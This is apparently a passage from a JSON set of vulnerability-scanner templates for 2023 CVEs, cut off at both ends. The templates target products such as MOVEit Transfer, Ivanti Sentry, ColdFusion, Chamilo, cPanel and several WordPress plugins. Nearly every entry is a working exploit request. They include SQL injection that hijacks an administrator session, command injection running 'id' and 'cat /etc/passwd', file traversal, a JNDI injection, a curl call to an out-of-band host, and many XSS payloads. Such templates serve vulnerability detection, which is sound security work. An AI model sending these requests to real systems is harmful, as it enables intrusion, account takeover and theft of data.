application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-24735","info":{"name":"PMB 7.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5('https://oast.me')}}"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-51449","info":{"name":"Gradio Hugging Face - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"files\";filename=\"okmijnuhbygv\"\nContent-Type: application/octet-stream\n\n{{str}}\n-----------------------------250033711231076532771336998311--\n","GET /file={{download_path}}{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"download_path","internal":true,"group":1,"regex":["\\[\"(.+)okmijnuhbygv\"\\]"]}],"payloads":{"path":["..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","../../../../../../../../../../../../../../../etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-40931","info":{"name":"Nagios XI v5.11.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=acknowledge_banner_message&id=*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to acknowledge","SQL Error","right syntax to use near"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","part":"body","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true}]}]},{"id":"CVE-2023-5561","info":{"name":"WordPress Core - Post Author Email Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins\")"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/{{route}}search=@"],"stop-at-first-match":true,"payloads":{"route":["wp-json/wp/v2/users?","?rest_route=/wp/v2/users&"]},"attack":"clusterbomb","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")","contains_all(body, \"[{\\\"id\", \"name\\\":\", \"@\")"],"condition":"and"}]}]},{"id":"CVE-2023-6379","info":{"name":"OpenCMS 14 & 15 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/tagebuch/eintraege/index.html?reloaded&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/list-editor/index.html?reloaded&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/compact/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/elaborate/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/masonry/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/blog/articles/index.html?reloaded&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1\"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1","/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>\" />","OpenCms"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2766","info":{"name":"Weaver OA 9.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header,\"text/plain\")","contains_all(body, \"sdbuser =\",\"sdbpassword =\")"],"condition":"and"}]}]},{"id":"CVE-2023-41265","info":{"name":"Qlik Sense Enterprise - HTTP Request Smuggling","severity":"critical"},"requests":[{"raw":["GET /resources/qmc/fonts/CVE-2023-41265.ttf HTTP/1.1\nHost: {{Hostname}}\nCookie: X-Qlik-Session=13333333-3333-3333-3333-333333333337\nContent-Type: text/html\nContent-Length: 5\nTransfer-Encoding: chunked\n\n;\n\n"],"unsafe":true,"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(header, 'Bad Request')"],"condition":"and"}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-25573","info":{"name":"Metersphere - Arbitrary File Read","severity":"high"},"requests":[{"raw":["POST /api/jmeter/download/files HTTP/1.1\nContent-Type: application/json\n\n{\"reportId\":\"{{str}}\",\"bodyFiles\":[{\"id\":\"{{rand}}\",\"name\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/etc/passwd"]},{"type":"word","part":"header","words":["filename=\"{{str}}.zip\"","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4112","info":{"name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"],"matchers":[{"type":"dsl","dsl":["contains(body, \"PHPJabbers\") && contains(body, \"><script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-43662","info":{"name":"ShokoServer System - Local File Inclusion (LFI)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/Image/withpath/C:\\Windows\\win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39676","info":{"name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid email"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1780","info":{"name":"Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"re not allowed to view\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-46574","info":{"name":"TOTOLINK A3700R - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"<title>TOTOLINK</title>\")"],"condition":"and"}]},{"raw":["GET /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\n\n{\"topicurl\":\"UploadFirmwareFile\",\"FileName\":\";id\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44393","info":{"name":"Piwigo - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=plugins&tab=new&installstatus=ok&plugin_id=nfez2%22%3E%3Cscript%3Eprompt(document.domain)%3C%2fscript%3Ehkugi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>prompt(document.domain)</script>","The plugin has been successfully copied"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37979","info":{"name":"Ninja Forms < 3.6.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"<img src=onerror=alert(document.domain)>\") && contains(body_2, \"import_form_template\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-6875","info":{"name":"WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-json/post-smtp/v1/get-log HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"success\\\":true,\", \"{\\\"fcm_token\\\":\\\"{{fcm_token}}\")","contains_all(body_3, \"true,\\\"data\\\":\", \"access_token=\")"],"condition":"and"}]}]},{"id":"CVE-2023-5244","info":{"name":"Microweber < V.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"alert(document.domain)\", \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5863","info":{"name":"phpMyFAQ < 3.2.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin/index.php?action=ngductung\"><img+src/onerror=\"alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src/onerror=\"alert(document.domain)\">","phpMyFAQ"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34755","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&action=edit HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-24322","info":{"name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert('document.domain')","File Browser"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4451","info":{"name":"Cockpit - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Space :<img src=1 onerror=alert(document.domain)>: does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43325","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/test%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3Etest"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel < 11.109.9999.116 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror=\"prompt(document.domain)\">"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-32068","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@oast.me\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40oast.me&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-4714","info":{"name":"PlayTube 3.0.1 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["razorpay_options","PlayTube","key:"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","regex":["key: \"([a-z_A-Z0-9]+)\""]}]}]},{"id":"CVE-2023-1719","info":{"name":"Bitrix Component - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'LOG_CNT':","<img onerror=alert(document.domain) src=1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-48728","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/functiongetOpenGraph.php?videoName=123+--><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"<script>alert(document.domain)</script>\", \"OpenGraph no video\")","status_code == 200 || status_code == 500","contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-43323","info":{"name":"mooSocial 3.1.8 - External Service Interaction","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["mooConfig"],"internal":true}]},{"raw":["POST /activities/ajax_share HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http://{{interactsh-url}}%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]}]}]},{"id":"CVE-2023-6360","info":{"name":"WordPress My Calendar <3.4.22 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar"]}]},{"raw":["@timeout: 20s\nGET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains(body, \"[]\")","duration >= 6"],"condition":"and"}]}]},{"id":"CVE-2023-3710","info":{"name":"Honeywell PM43 Printers - Command Injection","severity":"critical"},"requests":[{"raw":["POST /loadfile.lp?pageid=Configure HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"word","part":"body","words":["Release date"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38192","info":{"name":"SuperWebMailer 9.00.0.01710 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /superadmincreate.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPassword=a\"><script>alert(document.doamin);</script>&PasswordAgain=b&Language=de&SubmitBtn=Nutzer+erstellen\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"a\"><script>alert(document.doamin);</script>","SuperWebMailer"],"condition":"and","case-insensitive":true},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38035","info":{"name":"Ivanti Sentry - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /mics/services/MICSLogService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'isRunningTzz')","contains(interactsh_protocol, 'dns')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"critical"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-6895","info":{"name":"Hikvision IP ping.php - Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php/ping.php"],"body":"jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"payloads":{"command":["id","cmd /c ipconfig"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Windows 